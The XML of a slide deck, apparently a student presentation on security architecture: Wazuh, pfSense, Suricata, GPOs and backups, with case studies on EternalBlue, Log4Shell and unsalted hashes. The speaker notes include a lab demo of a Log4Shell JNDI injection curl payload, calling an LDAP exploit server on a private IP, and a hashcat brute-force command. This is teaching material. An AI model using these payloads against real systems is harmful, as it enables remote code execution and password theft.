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Inter SemiBold"/>
      <p:regular r:id="rId23"/>
      <p:bold r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inter Light"/>
      <p:regular r:id="rId25"/>
      <p:bold r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Int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A794D1-87B6-456A-B06D-A221D1F8B66F}">
  <a:tblStyle styleId="{92A794D1-87B6-456A-B06D-A221D1F8B6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SemiBold-bold.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inter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Light-bold.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/InterLight-regular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47724d849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47724d8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security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>architecture, where you are able to see the high level view of how some tool is able to prevent the different CVEs and how tool provide support for other tools.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wazuh is able to prevent malware attack and network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Pfsense is able to prevent malware, network, application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active directory can prevent password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suricata is able to prevent application and password attack.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is able to detect application and password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see that duplicity is able to provide resiliency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be1f37230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be1f3723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517cc0470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517cc04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malware attack, pfsense c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>an be configured to function to scan all content passing through the proxy for virus or malware signatures.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defend against network attack, we have to reduce the attack surface by requesting all external connection to use VPN with multi-factor authentication. This can be done using OpenVPN configurations as well as MiniOrange as a radius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weakness results from smb, we can further reduce the attack surface, but denying all smb traffic by default and whitelist IP range that is able to use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on, Snort has its own signature IDS to detect and prevent log4j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provide resiliency, we can download pfsense configuration file and store it locally and remotely.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27550954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2755095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is able to detect brute force attempt, and alert the corresponding authorities, it is also able to search the entire environment for traces of log4j. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It also provides resiliency as it stores a copy of logs.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intensive training, AI and machine learning establish baselines for your data and detect deviations from past behavior or abnormalities that might otherwise go undetected.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54b1d9e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54b1d9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Similar to Snort in its abilities &amp; functions.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Offers control type diversity by using products from different vendors to achieve the same objective.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Currently, focus is on Suricata's IPS mode.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Which has not been covered by our security architecture yet.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Suricata offers "active blocking", but it's not enabled by default.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*Suricata rules*</a:t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Suricata has 3 options for rules: drop, reject, or alert.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Quite similar to how Snort functions with regards to rules.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*brute force attacks*</a:t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How to prevent?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Quite tricky.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Most password authentications over a network are encrypted.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We can use a heuristics-based approach.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For example, a rule that looks for many established connections within a short time frame.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50825008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5082500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2 implementations to mitigate.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For web apps, implement hash + salt in code.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For password policies, use AD-enforced GPOs, via GPMC.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Why not user GPOs?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Since password policies can also be implemented locally on client.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Because client GPOs can be disabled by malware without a centrally controlled system.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52fc9ec35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52fc9ec3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*resiliency*</a:t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Duplicacy is a backup tool.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The aim is to backup user, system data &amp; system configurations.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It introduces resiliency to our security architecture.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By offering encryption, cloud backup, versioning, &amp; compression.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CLI-based tool.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 understand that we're familiar with Duplicati, but Duplicacy offers something different.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Much more customisable.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Advatanges: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Restore &amp; backup operations can be stopped &amp; resumed.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Much more stable than Duplicati.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554b1d9ea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554b1d9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554b1d9e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554b1d9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554b1d9e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554b1d9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554b1d9ea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554b1d9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554b1d9ea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554b1d9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39c9687e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39c9687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517cc047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517cc0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be sharing CVE-2017-0144 known as EternalBlue the most enduring and damaging exploit of all time. It is a Microsoft software vulnerabilities and the exploit created by NSA as a cyberattack. It targets the vulnerability in SMBv1(Server Message Block Version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exploit makes use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> way Microsoft Windows Handles, or rather mishandles, specially crafted packets from malicious attackers. All the attacker needs to do is send a maliciously-crafted packet to the target server, and the malware propagates and cyberattack ensues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50825008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5082500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One of the most popular application vulnerabilities.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Originated from log4j, an external logging library.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Think of it like a dependency.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Another terminology is JNDI.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Which is a Java API to interact with services, eg LDAP.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Not dangerous on its own.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diagram</a:t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Setup needs 3 machines: attacker, victim, &amp; LDAP server.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First, attacker sends a query WITH JNDI injection as payload.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Next, HTTP server, or the victim, with log4j installed, parses the JNDI query.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Note: Failure to sanitise query.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Victim sends a request for an LDAP lookup to the malicious LDAP server.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Finally, victim pulls the RCE code from LDAP server.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Somewhat similar to a reverse shell.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demo</a:t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docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929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java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.0.160 -p 8888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# will execute 'touch /tmp/pwned'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curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.0.160:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'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docker exec vulnerable-app ls /tmp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50825008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508250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Simple attack.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Comprised of 2 components: weak password policy &amp; lack of salting.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Want to focus on hashing without salting.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 is vulnerable to brute force attacks.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demo</a:t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.\hashcat.exe -m 0 -a 3 -o cracked.txt hashes.txt wordlist.txt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- `-m 0`: hash type (mode) MD5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- `-a 3`: attack mode brute force</a:t>
            </a:r>
            <a:endParaRPr sz="105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037850" y="1075050"/>
            <a:ext cx="7068300" cy="323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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6359650" y="4072625"/>
            <a:ext cx="2649600" cy="9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Presented By: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Dennis Ng Han Jie (204461H)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Joseph (200790F)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Tan Nguet Sen Jared (200463Z)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037850" y="6100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Security Architecture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0" y="1158725"/>
            <a:ext cx="7803692" cy="38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33400" y="1227625"/>
            <a:ext cx="1394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Wazuh</a:t>
            </a:r>
            <a:endParaRPr sz="30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58088" y="2507600"/>
            <a:ext cx="2381100" cy="17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File Integrity Monitoring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Integration with VirusTotal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Auto-remove malware </a:t>
            </a:r>
            <a:endParaRPr sz="1500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4294967295" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258100" y="480300"/>
            <a:ext cx="1545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Tools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258088" y="2019375"/>
            <a:ext cx="2878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Malware Attack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3023188" y="2019375"/>
            <a:ext cx="24696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Network Attack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023200" y="2507600"/>
            <a:ext cx="2381100" cy="7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Auto block IP address</a:t>
            </a:r>
            <a:endParaRPr sz="1500"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5741900" y="2019375"/>
            <a:ext cx="314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Detect Unkn. Threat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741888" y="2507600"/>
            <a:ext cx="2381100" cy="17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Process Monitoring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Port Monitoring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AI</a:t>
            </a:r>
            <a:endParaRPr sz="15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788" y="581175"/>
            <a:ext cx="3338325" cy="11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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039900" y="3702725"/>
            <a:ext cx="2301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Enhancements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000000" y="4099025"/>
            <a:ext cx="2381100" cy="7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Email / SMS alerts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Backup Wazuh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275875" y="5312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Pfsense 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71500" y="1137250"/>
            <a:ext cx="29496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Malware Attack</a:t>
            </a:r>
            <a:endParaRPr sz="25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malware as it is being downloaded</a:t>
            </a:r>
            <a:endParaRPr sz="16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097200" y="1137250"/>
            <a:ext cx="29496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Network Attack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VPN + MFA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Deny all smb traffic, whitelist IP range that is able to use them.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5992800" y="1137250"/>
            <a:ext cx="29496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Application </a:t>
            </a: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Attack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its own signature IDs to detect and prevent</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="12675" y="3015225"/>
            <a:ext cx="9159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271500" y="3156025"/>
            <a:ext cx="5482800" cy="18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Resiliency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Download pfsense configuration and store it locally and remotely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Centralised log management as logs are send to splunk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75875" y="5312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277800" y="1137250"/>
            <a:ext cx="35631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Password </a:t>
            </a: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Attack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logs for traces of brute force attempts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Alert corresponding authorities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621200" y="1137250"/>
            <a:ext cx="48957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Application Attack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through logs for traces of log4j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Alert corresponding authorities</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="12675" y="3015225"/>
            <a:ext cx="9159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98800" y="3232225"/>
            <a:ext cx="3927000" cy="19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Unknown Threat Detection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 baseline for user behavior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deviation from past user behaviours or abnormalities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642200" y="3232225"/>
            <a:ext cx="4424400" cy="18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nter SemiBold"/>
                <a:ea typeface="Inter SemiBold"/>
                <a:cs typeface="Inter SemiBold"/>
                <a:sym typeface="Inter SemiBold"/>
              </a:rPr>
              <a:t>Incident Response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 logs from Pfsense and Suricata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 through logs for “alerts”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Notify corresponding authorities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Suricata - IDS &amp; IPS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037825" y="1353950"/>
            <a:ext cx="35613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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control type diversity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IPS mode: active blocking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rule to prevent Log4Shell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Brute force attacks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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heuristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-based approach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eg many established connections within a short time frame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450" y="542525"/>
            <a:ext cx="878500" cy="6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125" y="1232288"/>
            <a:ext cx="4475749" cy="244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Password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Attack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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AD-enforced GPOs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> (GPMC)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not user GPOs?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 GPO policies can be disabled without a centrally controlled system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Network Attack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Disable SMBv1 protocol</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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Duplicacy -  Backup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1037875" y="1353950"/>
            <a:ext cx="7173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Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Resiliency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Backup user, system data, &amp; system configuration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Encryption, Cloud Backup, Versioning, Compression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CLI-based tool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✔️ Restore &amp; backup can be stopped &amp; resumed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✔️ Much more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> than Duplicati</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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25" y="486125"/>
            <a:ext cx="746176" cy="7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88" y="425425"/>
            <a:ext cx="8665622" cy="42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High-Profile User Compromise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37875" y="1353950"/>
            <a:ext cx="3399000" cy="34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Hackers vished Twitter’s employees by claiming to be Twitter’s Help Desk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Led the employees to a phishing website, thus logging their credentials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Accessed internal systems to gain info on which accounts has admin tools, and performed another vishing attempt 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25" y="2447476"/>
            <a:ext cx="1827500" cy="11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725" y="2240350"/>
            <a:ext cx="2765065" cy="1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900" y="524563"/>
            <a:ext cx="1263515" cy="10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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037850" y="31805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Scenario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High-Profile User Compromise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068000" y="1353950"/>
            <a:ext cx="316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the admin tool to login to high-profile users accounts and tweeted Bitcoin scams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Stole the users’ information through the Your Twitter Data tool such as DMs, search history, contact numbers and email addresses</a:t>
            </a:r>
            <a:endParaRPr sz="17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625" y="2284275"/>
            <a:ext cx="2440825" cy="15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450" y="1879225"/>
            <a:ext cx="2093100" cy="28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Malicious Memes</a:t>
            </a:r>
            <a:endParaRPr sz="3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037875" y="1353950"/>
            <a:ext cx="316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Hacker tweeted images that have embedded commands inside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Two-stage malware, a malware will download the images then extract the commands and run them</a:t>
            </a:r>
            <a:endParaRPr sz="17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1037850" y="31805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Scenario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25" y="1518500"/>
            <a:ext cx="2299950" cy="22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Malicious Memes</a:t>
            </a:r>
            <a:endParaRPr sz="3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37875" y="3487350"/>
            <a:ext cx="3854400" cy="90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 all captured information to attacker’s server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1037863" y="1353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{92A794D1-87B6-456A-B06D-A221D1F8B66F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1086575"/>
                <a:gridCol w="2902950"/>
              </a:tblGrid>
              <a:tr h="45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/print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Capture screenshot of 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/processos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list of processes running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/clip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Capture clipboard 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usernames from machine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/docs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files from predefined path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975" y="1679875"/>
            <a:ext cx="3820375" cy="30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37875" y="1738025"/>
            <a:ext cx="3384000" cy="8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Remote code execution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Microsoft Office</a:t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037875" y="1232027"/>
            <a:ext cx="7839000" cy="91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CVE-2021-40444 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500"/>
              <a:t>(Malware Attack)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037875" y="4594150"/>
            <a:ext cx="514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“Microsoft MSHTML Remote Code Execution Vulnerability”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="7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2638050"/>
            <a:ext cx="3345025" cy="18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4294967295" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037875" y="487825"/>
            <a:ext cx="11988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CVE</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="accent2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950" y="2261812"/>
            <a:ext cx="4549152" cy="219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037875" y="1323825"/>
            <a:ext cx="3721500" cy="23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Microsoft software vulnerabilities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Targets SMBv1 vulnerabilities</a:t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037875" y="142875"/>
            <a:ext cx="7068300" cy="108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CVE-2017-0144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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Windows SMB Remote Code Execution Vulnerability)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"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037875" y="4291750"/>
            <a:ext cx="777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00" y="1323825"/>
            <a:ext cx="4079825" cy="178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CVE-2021-44228 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Log4Shell)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037875" y="1353950"/>
            <a:ext cx="39198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Log4j: Popular Java logging library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JNDI: Java API to interact with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>services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25" y="3275350"/>
            <a:ext cx="4100851" cy="15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625" y="1353950"/>
            <a:ext cx="3171006" cy="36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CVE-2022-37164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037875" y="1353950"/>
            <a:ext cx="332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Brute-force attacks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Passwords are hashed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>salt</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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70" y="3069970"/>
            <a:ext cx="3786850" cy="17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50" y="1353950"/>
            <a:ext cx="4513426" cy="1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